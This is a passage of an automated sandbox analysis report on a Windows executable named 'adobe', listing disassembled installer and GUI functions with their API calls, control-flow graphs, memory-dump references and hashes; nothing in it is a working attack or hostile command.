                                                                                                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
                                                                                                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
                                                                                                                                                          • FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                          • API String ID: 2252812187-1888249752
                                                                                                                                                          • Opcode ID: d105dc908bc0adffe750a261d75f2fb918e24e77c14577ae5efca0af878be54f
                                                                                                                                                          • Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
                                                                                                                                                          • Opcode Fuzzy Hash: d105dc908bc0adffe750a261d75f2fb918e24e77c14577ae5efca0af878be54f
                                                                                                                                                          • Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00423C1C Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1865 423c1c-423c50 1866 423c52-423c53 1865->1866 1867 423c84-423c9b call 423b78 1865->1867 1868 423c55-423c71 call 40b44c 1866->1868 1872 423cfc-423d01 1867->1872 1873 423c9d 1867->1873 1901 423c73-423c7b 1868->1901 1902 423c80-423c82 1868->1902 1877 423d03 1872->1877 1878 423d37-423d3c 1872->1878 1875 423ca3-423ca6 1873->1875 1876 423d60-423d70 1873->1876 1881 423cd5-423cd8 1875->1881 1882 423ca8 1875->1882 1885 423d72-423d77 1876->1885 1886 423d7b-423d83 call 4241a4 1876->1886 1879 423fc1-423fc9 1877->1879 1880 423d09-423d11 1877->1880 1883 423d42-423d45 1878->1883 1884 4240aa-4240b8 IsIconic 1878->1884 1890 424162-42416a 1879->1890 1896 423fcf-423fda call 4181f0 1879->1896 1888 423f23-423f4a SendMessageA 1880->1888 1889 423d17-423d1c 1880->1889 1897 423db9-423dc0 1881->1897 1898 423cde-423cdf 1881->1898 1892 423e06-423e16 call 423b94 1882->1892 1893 423cae-423cb1 1882->1893 1894 4240e6-4240fb call 424860 1883->1894 1895 423d4b-423d4c 1883->1895 1884->1890 1891 4240be-4240c9 GetFocus 1884->1891 1899 423d88-423d90 call 4241ec 1885->1899 1900 423d79-423d9c call 423b94 1885->1900 1886->1890 1888->1890 1913 423d22-423d23 1889->1913 1914 42405a-424065 1889->1914 1915 424181-424187 1890->1915 1891->1890 1905 4240cf-4240d8 call 41f004 1891->1905 1892->1890 1906 423cb7-423cba 1893->1906 1907 423e2e-423e4a PostMessageA call 423b94 1893->1907 1894->1890 1917 423d52-423d55 1895->1917 1918 4240fd-424104 1895->1918 1896->1890 1949 423fe0-423fef call 4181f0 IsWindowEnabled 1896->1949 1897->1890 1910 423dc6-423dcd 1897->1910 1911 423ce5-423ce8 1898->1911 1912 423f4f-423f56 1898->1912 1899->1890 1900->1890 1901->1915 1902->1867 1902->1868 1905->1890 1963 4240de-4240e4 SetFocus 1905->1963 1924 423cc0-423cc3 1906->1924 1925 423eb5-423ebc 1906->1925 1907->1890 1910->1890 1930 423dd3-423dd9 1910->1930 1931 423cee-423cf1 1911->1931 1932 423e4f-423e6f call 423b94 1911->1932 1912->1890 1940 423f5c-423f61 call 404e54 1912->1940 1933 424082-42408d 1913->1933 1934 423d29-423d2c 1913->1934 1914->1890 1936 42406b-42407d 1914->1936 1937 424130-424137 1917->1937 1938 423d5b 1917->1938 1927 424106-424119 call 4244e4 1918->1927 1928 42411b-42412e call 42453c 1918->1928 1944 423cc9-423cca 1924->1944 1945 423dde-423dec IsIconic 1924->1945 1946 423ebe-423ed1 call 423b24 1925->1946 1947 423eef-423f00 call 423b94 1925->1947 1927->1890 1928->1890 1930->1890 1950 423cf7 1931->1950 1951 423e1b-423e29 call 424188 1931->1951 1978 423e93-423eb0 call 423a94 PostMessageA 1932->1978 1979 423e71-423e8e call 423b24 PostMessageA 1932->1979 1933->1890 1958 424093-4240a5 1933->1958 1955 423d32 1934->1955 1956 423f66-423f6e 1934->1956 1936->1890 1953 42414a-424159 1937->1953 1954 424139-424148 1937->1954 1957 42415b-42415c call 423b94 1938->1957 1940->1890 1964 423cd0 1944->1964 1965 423da1-423da9 1944->1965 1971 423dfa-423e01 call 423b94 1945->1971 1972 423dee-423df5 call 423bd0 1945->1972 1994 423ee3-423eea call 423b94 1946->1994 1995 423ed3-423edd call 41ef68 1946->1995 1999 423f02-423f08 call 41eeb4 1947->1999 2000 423f16-423f1e call 423a94 1947->2000 1949->1890 1996 423ff5-424004 call 4181f0 IsWindowVisible 1949->1996 1950->1957 1951->1890 1953->1890 1954->1890 1955->1957 1956->1890 1962 423f74-423f7b 1956->1962 1987 424161 1957->1987 1958->1890 1962->1890 1980 423f81-423f90 call 4181f0 IsWindowEnabled 1962->1980 1963->1890 1964->1957 1965->1890 1981 423daf-423db4 call 422c5c 1965->1981 1971->1890 1972->1890 1978->1890 1979->1890 1980->1890 2010 423f96-423fac call 412320 1980->2010 1981->1890 1987->1890 1994->1890 1995->1994 1996->1890 2017 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1996->2017 2014 423f0d-423f10 1999->2014 2000->1890 2010->1890 2020 423fb2-423fbc 2010->2020 2014->2000 2017->1890 2020->1890
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 46663b6db67648ed267530da3886890c39e36ee4c42744e02747fab3d2fd9775
                                                                                                                                                          • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                                                                                                          • Opcode Fuzzy Hash: 46663b6db67648ed267530da3886890c39e36ee4c42744e02747fab3d2fd9775
                                                                                                                                                          • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00466BB8 Relevance: 15.7, APIs: 4, Strings: 4, Instructions: 1657windowCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2180 466bb8-466bce 2181 466bd0-466bd3 call 402d30 2180->2181 2182 466bd8-466c8f call 493de0 call 402b30 * 6 2180->2182 2181->2182 2199 466c91-466cb8 call 41464c 2182->2199 2200 466ccc-466ce5 2182->2200 2206 466cbd-466cc7 call 41460c 2199->2206 2207 466cba 2199->2207 2204 466ce7-466d0e call 41462c 2200->2204 2205 466d22-466d30 call 4940e8 2200->2205 2213 466d13-466d1d call 4145ec 2204->2213 2214 466d10 2204->2214 2215 466d32-466d41 call 493f30 2205->2215 2216 466d43-466d45 call 494054 2205->2216 2206->2200 2207->2206 2213->2205 2214->2213 2221 466d4a-466d9d call 493a44 call 41a3e0 * 2 2215->2221 2216->2221 2228 466dae-466dc3 call 450ac8 call 414b28 2221->2228 2229 466d9f-466dac call 414b28 2221->2229 2235 466dc8-466dcf 2228->2235 2229->2235 2236 466e17-46729d call 493e80 call 4941a4 call 41462c * 3 call 4146cc call 4145ec * 3 call 460424 call 46043c call 460448 call 460490 call 460424 call 46043c call 460448 call 460490 call 46043c call 460490 LoadBitmapA call 41d6c0 call 460460 call 460478 call 466994 call 4684d0 call 466014 call 40357c call 414b28 call 46634c call 466354 call 466014 call 40357c * 2 call 414b28 call 4684d0 call 466014 call 414b28 call 46634c call 466354 call 414b28 * 2 call 4684d0 call 414b28 * 2 call 46634c call 41460c call 46634c call 41460c call 4684d0 call 414b28 call 46634c call 466354 call 4684d0 call 414b28 call 46634c call 41460c * 2 call 414b28 call 46634c call 41460c 2235->2236 2237 466dd1-466e12 call 4146cc call 414710 call 420fa8 call 420fd4 call 420b78 call 420ba4 2235->2237 2367 46729f-4672f7 call 41460c call 414b28 call 46634c call 41460c 2236->2367 2368 4672f9-467312 call 414a54 * 2 2236->2368 2237->2236 2375 467317-4673c8 call 466014 call 4684d0 call 466014 call 414b28 call 4941a4 call 46634c 2367->2375 2368->2375 2394 467402-467638 call 466014 call 414b28 call 4941b4 * 2 call 42e734 call 41460c call 46634c call 41460c call 4181f0 call 42ebac call 414b28 call 493e80 call 4941a4 call 41462c call 466014 call 414b28 call 46634c call 41460c call 466014 call 4684d0 call 466014 call 414b28 call 46634c call 41460c call 466354 call 466014 call 414b28 call 46634c 2375->2394 2395 4673ca-4673e5 2375->2395 2456 46763a-467643 2394->2456 2457 467679-467732 call 466014 call 4684d0 call 466014 call 414b28 call 4941a4 call 46634c 2394->2457 2396 4673e7 2395->2396 2397 4673ea-4673fd call 41460c 2395->2397 2396->2397 2397->2394 2456->2457 2458 467645-467674 call 414a54 call 466354 2456->2458 2475 467734-46774f 2457->2475 2476 46776c-467bb3 call 466014 call 414b28 call 4941b4 * 2 call 42e734 call 41460c call 46634c call 41460c call 414b28 call 493e80 call 4941a4 call 41462c call 414b28 call 466014 call 4684d0 call 466014 call 414b28 call 46634c call 466354 call 42bbe0 call 4941b4 call 44e104 call 466014 call 4684d0 call 466014 call 4684d0 call 414b28 * 2 call 466014 call 4684d0 * 2 call 414b28 call 46634c call 466354 call 4684d0 call 493a44 call 41a3e0 call 466014 call 40357c call 414b28 call 46634c call 41460c call 414b28 * 2 call 4941b4 call 403494 call 40357c * 2 call 414b28 2457->2476 2458->2457 2477 467754-467767 call 41460c 2475->2477 2478 467751 2475->2478 2579 467bd7-467bde 2476->2579 2580 467bb5-467bd2 call 44f80c call 44f968 2476->2580 2477->2476 2478->2477 2581 467c02-467c09 2579->2581 2582 467be0-467bfd call 44f80c call 44f968 2579->2582 2580->2579 2585 467c2d-467c73 call 4181f0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 4685c4 2581->2585 2586 467c0b-467c28 call 44f80c call 44f968 2581->2586 2582->2581 2600 467c75-467c7c 2585->2600 2601 467c8d 2585->2601 2586->2585 2602 467c7e-467c87 2600->2602 2603 467c89-467c8b 2600->2603 2604 467c8f-467c9e 2601->2604 2602->2601 2602->2603 2603->2604 2605 467ca0-467ca7 2604->2605 2606 467cb8 2604->2606 2607 467cb4-467cb6 2605->2607 2608 467ca9-467cb2 2605->2608 2609 467cba-467cd4 2606->2609 2607->2609 2608->2606 2608->2607 2610 467d7d-467d84 2609->2610 2611 467cda-467ce3 2609->2611 2612 467e17-467e25 call 414b28 2610->2612 2613 467d8a-467dad call 47af6c call 403450 2610->2613 2614 467ce5-467d3c call 47af6c call 414b28 call 47af6c call 414b28 call 47af6c call 414b28 2611->2614 2615 467d3e-467d78 call 414b28 * 3 2611->2615 2621 467e2a-467e33 2612->2621 2635 467dbe-467dd2 call 403494 2613->2635 2636 467daf-467dbc call 47b10c 2613->2636 2614->2610 2615->2610 2626 467f43-467f72 call 42b97c call 44e090 2621->2626 2627 467e39-467e51 call 429fe8 2621->2627 2653 468020-468024 2626->2653 2654 467f78-467f7c 2626->2654 2644 467e53-467e57 2627->2644 2645 467ec8-467ecc 2627->2645 2658 467de4-467e15 call 42c7d0 call 42cb8c call 403494 call 414b28 2635->2658 2659 467dd4-467ddf call 403494 2635->2659 2636->2658 2652 467e59-467e93 call 40b44c call 47af6c 2644->2652 2650 467ece-467ed7 2645->2650 2651 467f1c-467f20 2645->2651 2650->2651 2660 467ed9-467ee4 2650->2660 2656 467f34-467f3e call 42a06c 2651->2656 2657 467f22-467f32 call 42a06c 2651->2657 2712 467e95-467e9c 2652->2712 2713 467ec2-467ec6 2652->2713 2664 468026-46802d 2653->2664 2665 4680a3-4680a7 2653->2665 2663 467f7e-467f90 call 40b44c 2654->2663 2656->2626 2657->2626 2658->2621 2659->2658 2660->2651 2671 467ee6-467eea 2660->2671 2692 467fc2-467ff9 call 47af6c call 44c360 2663->2692 2693 467f92-467fc0 call 47af6c call 44c430 2663->2693 2664->2665 2676 46802f-468036 2664->2676 2677 468110-468119 2665->2677 2678 4680a9-4680c0 call 40b44c 2665->2678 2673 467eec-467f0f call 40b44c call 406acc 2671->2673 2722 467f16-467f1a 2673->2722 2723 467f11-467f14 2673->2723 2676->2665 2687 468038-468043 2676->2687 2685 46811b-468133 call 40b44c call 469238 2677->2685 2686 468138-46814d call 4666f4 call 466470 2677->2686 2705 4680c2-4680fe call 40b44c call 469238 * 2 call 4690d8 2678->2705 2706 468100-46810e call 469238 2678->2706 2685->2686 2736 46819f-4681a9 call 414a54 2686->2736 2737 46814f-468172 call 42a050 call 40b44c 2686->2737 2687->2686 2695 468049-46804d 2687->2695 2738 467ffe-468002 2692->2738 2693->2738 2704 46804f-468065 call 40b44c 2695->2704 2733 468067-468093 call 42a06c call 469238 call 4690d8 2704->2733 2734 468098-46809c 2704->2734 2705->2686 2706->2686 2712->2713 2724 467e9e-467eb0 call 406acc 2712->2724 2713->2645 2713->2652 2722->2651 2722->2673 2723->2651 2724->2713 2749 467eb2-467ebc 2724->2749 2733->2686 2734->2704 2741 46809e 2734->2741 2750 4681ae-4681cd call 414a54 2736->2750 2764 468174-46817b 2737->2764 2765 46817d-46818c call 414a54 2737->2765 2739 468004-46800b 2738->2739 2740 46800d-46800f 2738->2740 2739->2740 2748 468016-46801a 2739->2748 2740->2748 2741->2686 2748->2653 2748->2663 2749->2713 2754 467ebe 2749->2754 2766 4681f7-46821a call 47af6c call 403450 2750->2766 2767 4681cf-4681f2 call 42a050 call 469398 2750->2767 2754->2713 2764->2765 2770 46818e-46819d call 414a54 2764->2770 2765->2750 2781 468236-46823f 2766->2781 2782 46821c-468225 2766->2782 2767->2766 2770->2750 2784 468255-468265 call 403494 2781->2784 2785 468241-468253 call 403684 2781->2785 2782->2781 2783 468227-468234 call 47b10c 2782->2783 2793 468277-46828e call 414b28 2783->2793 2784->2793 2785->2784 2792 468267-468272 call 403494 2785->2792 2792->2793 2797 4682c4-4682ce call 414a54 2793->2797 2798 468290-468297 2793->2798 2802 4682d3-4682f8 call 403400 * 3 2797->2802 2800 4682a4-4682ae call 42b0f4 2798->2800 2801 468299-4682a2 2798->2801 2803 4682b3-4682c2 call 414a54 2800->2803 2801->2800 2801->2803 2803->2802
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00493F30: GetWindowRect.USER32(00000000), ref: 00493F46
                                                                                                                                                          • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466F87
                                                                                                                                                            • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466FA1), ref: 0041D6EB
                                                                                                                                                            • Part of subcall function 00466994: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00466A37
                                                                                                                                                            • Part of subcall function 00466994: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A5D
                                                                                                                                                            • Part of subcall function 00466994: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00466AB4
                                                                                                                                                            • Part of subcall function 00466354: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,0046703C,00000000,00000000,00000000,0000000C,00000000), ref: 0046636C
                                                                                                                                                            • Part of subcall function 004941B4: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 004941BE
                                                                                                                                                            • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                                                                                            • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                                                                                            • Part of subcall function 00493E80: 73A1A570.USER32(00000000,?,?,?), ref: 00493EA2
                                                                                                                                                            • Part of subcall function 00493E80: SelectObject.GDI32(?,00000000), ref: 00493EC8
                                                                                                                                                            • Part of subcall function 00493E80: 73A1A480.USER32(00000000,?,00493F26,00493F1F,?,00000000,?,?,?), ref: 00493F19
                                                                                                                                                            • Part of subcall function 004941A4: MulDiv.KERNEL32(0000004B,?,00000006), ref: 004941AE
                                                                                                                                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0234D9AC,0234F600,?,?,0234F630,?,?,0234F680,?), ref: 00467C37
                                                                                                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467C48
                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467C60
                                                                                                                                                            • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                                                                                          • String ID: $(Default)$STOPIMAGE${H
                                                                                                                                                          • API String ID: 3271511185-3436354053
                                                                                                                                                          • Opcode ID: cf9293c97e3e9aca9c52ec66c160936cc4d015187b0941d35e3759e4b6dad66f
                                                                                                                                                          • Instruction ID: a6f197261a18fc9eff18fbfa3c5028089fc26a300eb1d9caf07a23dde61acc02
                                                                                                                                                          • Opcode Fuzzy Hash: cf9293c97e3e9aca9c52ec66c160936cc4d015187b0941d35e3759e4b6dad66f
                                                                                                                                                          • Instruction Fuzzy Hash: D6F2C6386005148FCB00EB59D5D9F9973F5FF49308F1542BAE5049B36ADB78AC4ACB8A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00474078 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004741E2,?,?,0049B178,00000000), ref: 004740D1
                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004741E2,?,?,0049B178,00000000), ref: 004741AE
                                                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004741E2,?,?,0049B178,00000000), ref: 004741BC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                          • String ID: unins$unins???.*
                                                                                                                                                          • API String ID: 3541575487-1009660736
                                                                                                                                                          • Opcode ID: d1295e83b56cadd679e89516fa4fe8789c35b69324b7d899325b3bebbac489a6
                                                                                                                                                          • Instruction ID: b9c1e050b5ed1d52b1e0efb42f65b2bb765eda7093c4a0c3f8d8c725b59b8066
                                                                                                                                                          • Opcode Fuzzy Hash: d1295e83b56cadd679e89516fa4fe8789c35b69324b7d899325b3bebbac489a6
                                                                                                                                                          • Instruction Fuzzy Hash: 2A3152746001089BDB10EB65CD85AEE77B9DF84304F5085F6A44CAB2A2DB39DF858B58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004520D0 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00452133,?,?,-00000001,00000000), ref: 0045210D
                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,00452133,?,?,-00000001,00000000), ref: 00452115
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 873889042-0
                                                                                                                                                          • Opcode ID: 88b781bcb4296e3ffd537f7f1e95cbcfccc1e4a3efc523db206327babc368b1c
                                                                                                                                                          • Instruction ID: 036c49f36eb25fa61e7078d8567b07750d6f93a8171c6e64b92e95661d512f34
                                                                                                                                                          • Opcode Fuzzy Hash: 88b781bcb4296e3ffd537f7f1e95cbcfccc1e4a3efc523db206327babc368b1c
                                                                                                                                                          • Instruction Fuzzy Hash: E4F0FE71A046046B8B10DF6A9D0149FF7ACDB46725B504677FC14D3292D6795E044598
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00408570 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                          • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                                                                                          • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                                                                                          • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                                                                                          • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00423B94 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                          • Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                                                                                          • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                                                                                          • Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                                                                                          • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00454AC8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
